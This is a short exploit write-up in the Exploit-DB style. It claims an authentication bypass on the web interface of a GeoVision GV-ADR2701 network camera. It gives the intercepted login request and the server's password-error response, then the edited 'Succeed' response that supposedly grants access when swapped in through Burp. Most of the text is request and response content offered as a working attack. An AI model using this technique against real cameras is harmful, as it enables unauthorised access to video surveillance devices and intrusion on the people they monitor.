# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass # Device name: GV-ADR2701# Date: 26 December , 2020# Exploit Author: Chan Nyein Wai# Vendor Homepage: https://www.geovision.com.tw/# Software Link: https://www.geovision.com.tw/download/product/# Firmware Version: V1.00_2017_12_15# Tested on: windows 10# Exploitation1. Capture The Login Request with burp, Do intercept request to response
Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host:10.10.10.10
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript,*/*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length:46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1{"UserName":"admin","Password":"0X]&0D]]05"}
```
2. The following is the normal response when you login to the server.
```
HTTP/1.1200 Ok
Content-Length:170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{"Response":{"ResponseURL":"/LAPI/V1.0/Channel/0/System/Login","CreatedID":-1,"StatusCode":460,"StatusString":"PasswdError","Data":"null"}}
```
By editing the response to the following, you can successfully log in to
the web application.
```
HTTP/1.1200 Ok
Content-Length:170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{"Response":{"ResponseURL":"/LAPI/V1.0/Channel/0/System/Login","CreatedID":-1,"StatusCode":0,"StatusString":"Succeed","Data":"null"}}
```
